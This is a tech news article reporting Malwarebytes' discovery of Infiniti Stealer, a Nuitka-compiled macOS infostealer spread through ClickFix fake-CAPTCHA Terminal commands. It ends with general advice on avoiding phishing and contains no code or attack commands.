Another worrying macOS malware scheme has been discovered — here's how to stay safe

News
By published

Malwarebytes discovered Infiniti Stealer

A stylized depiction of a padlocked WiFi symbol sitting in the centre of an interlocking vault.
(Image credit: Shutterstock)
  • Malwarebytes uncovers Infiniti Stealer targeting macOS via ClickFix social engineering
  • Victims tricked into running malicious Terminal code, bypassing traditional defenses
  • Stealer compiled with Nuitka, exfiltrates browser credentials, Keychain data, wallets, and screenshots

MacOS devices are being increasingly targeted with malware, as security researchers discover yet another infostealer variant in the wild.

Malwarebytes published an in-depth report on a piece of malware called Infiniti Stealer, which was apparently compiled in a rather unusual fashion.

Infiniti Stealer is apparently distributed via a ClickFix social engineering attack. A ClickFix attack tricks the victim by presenting a “problem” and, at the same time, offering a “solution”. In this case, Malwarebytes says the victims are being redirected to update-check[.]com (most likely through phishing emails claiming certain software needs updating in order to work properly) where they are shown a benign-looking CAPTCHA.

Article continues below

Compiled with Nuitka

Besides the usual “I am not a robot” checkbox, the CAPTCHA has an additional step (which should also serve as a major red flag): to open Spotlight (the built-in search tool), run Terminal, and paste the given code. This code runs a dropper which, in turn, delivers Infiniti Stealer.

“Because the user runs the command directly, many traditional defenses are bypassed,” Malwarebytes explained. “There’s no exploit, no malicious attachment, and no drive‑by download.”

What makes this malware stand out is the fact that it is written in Python, but compiled with Nuitka, a compiler that converts Python code into standalone executables or optimized binaries.

The resulting product is a native macOS binary which, according to the researchers, makes it harder to analyze and detect compared to your typical off-the-shelf Python-based malware.

“To our knowledge, this is the first documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python stealer,” Malwarebytes said.

An infostealer is a malware variant designed to exfiltrate sensitive data from target devices. Usually delivered through social engineering, infostealers get installed through droppers, and try to upload various types of information to an attacker-controlled server, including browser data (cookies, stored passwords, cryptocurrency wallet plugins, etc.) passwords, sensitive files (.docx, .txt, .pdf, and other formats), and other files deemed of value.

Depending on the type of malware, these can try to upload more or less data, and come with different obfuscation and persistence mechanisms.

How to stay safe from phishing and infostealers

A fish hook is lying across a computer keyboard, representing a phishing attack on a computer system

Phishing is one of the most popular attack vectors today (Image credit: weerapatkiatdumrong / Getty Images)

Infiniti is capable of stealing a wide range of sensitive data. Primarily, it hunts for credentials from Chromium-based browsers, as well as Firefox. It can exfiltrate macOS Keychain entries, cryptocurrency wallets, and plaintext secrets in developer files such as .env. Finally, it will also exfiltrate screenshots captured during execution.

Social engineering is a popular scam tactic, and phishing emails continue being the biggest attack vector out there. To prevent falling prey to these campaigns, exercise caution and a high level of skepticism towards any and all incoming communications, be it email, instant messaging, or phone. Double-check all links being shared in the email, and hunt for typos, letters replaced by numbers, and otherwise suspicious variations of known domains. (For example, microsoft is often spelled with an “RN” instead of “M” in phishing emails - rnicrosoft - making it almost indistinguishable).

Be careful when downloading attachments (especially when receiving an unexpected message) and make sure you’re running phishing-proof multi-factor authentication.

Via BleepingComputer

Best antivirus software header
The best antivirus for all budgets

➡️ Read our full guide to the best antivirus
1. Best overall:
Bitdefender Total Security
2. Best for families:
Norton 360 with LifeLock
3. Best for mobile:
McAfee Mobile Security

Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!

And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.